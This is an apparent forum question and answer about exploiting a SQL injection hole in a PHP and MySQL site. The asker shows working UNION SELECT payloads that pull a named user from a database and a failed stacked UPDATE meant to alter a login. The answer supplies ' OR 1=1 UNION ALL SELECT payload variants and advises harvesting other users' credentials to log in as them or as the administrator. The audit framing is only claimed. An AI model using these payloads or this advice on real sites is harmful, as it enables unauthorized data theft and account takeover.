I am currently working auditing web pages. An audit project is a website that is vulnerable to sql injection.
Then for possible vulnerabilities in the web page I found one that compromises the database.
After searching potential vulnerabilities have used software to help me or rather I was easier to find all tables without losing much time to keep trying words one by one.
The problem is I can do SELECT but I can not update queries. I have no source code of the application they use, but I suspect they are using something.
$query = mysql_query("SELECT * FROM members WHERE user='".$_POST['user']."'");
But then I encounter the problem that mysql_query can not be put into two queries, namely this:
开发者_如何转开发$query = mysql_query("SELECT * FROM members WHERE user='".$_POST['user']."';UPDATE blablabla");
The query I'm using to inject something like this.(This query run correctly)
testpage.php?find=Search&
search=9.9'
+union+all+select+NULL,
(select+concat
(users.username)
+from+`inya`.users+where+users.username="ckyli"+Order+by+username+limit+0,1)+,NULL,NULL+and+'x'='x’
then I want to update your query, the query is constructed that, the query fails because it does not change my login name
testpage.php?find=Search&search=9.9';UPDATE+users+SET+username=”pentest”+ where+username=”ckyli”+ and+first_name=”Alejandro”+ and+last_name=”Garcia”--
I'm a little confused on all I've found that using mysqli then i do not know how to operate it.
I've tried everything using load_file, union but maybe do not know how to use properly. I'm no security expert but I will defend well enough. My question is, would anyone be so kind to help me run my query update it?
Many thanks in advance.
You cannot update inside a select statement.
This is because MySQL(i)_ (the php-lib) does not allow you to run two queries.
You've already figured this out, nothing after the ;
can be executed and if you start with a select you cannot get out of the select.
The object of the exercise now changes to getting user-ids and passwords.
You can do this with a union all injection. If you have a statement like this:
$query = mysql_query("SELECT * FROM members WHERE user='".$_POST['user']."'");
^ ^ ^
2 3 1
You can get a list of all members by doing.
' OR 1=1 UNION ALL SELECT * FROM members -- or
" OR 1=1 UNION ALL SELECT * FROM members -- or
') OR 1=1 UNION ALL SELECT * FROM members -- or .....
^
+--Must match with part 1 above.
Some experimentation will be required.
When exploiting unescaped queries it important to match both part 1 and part 2, or the query will fail, you also need to select from an existing table (part 3).
If you can force the webapp to generate an error message that will help a lot, because if you get an error like:
Error: The used select statements have a different number of columns
Or the framework is even nice enough to give you the text of the query, you don't have to guess so much.
Once you have user credentials for a different user, you can log in with that data and access their data. If you have the superuser account data, you can even login to the administrator console and alter stuff.
精彩评论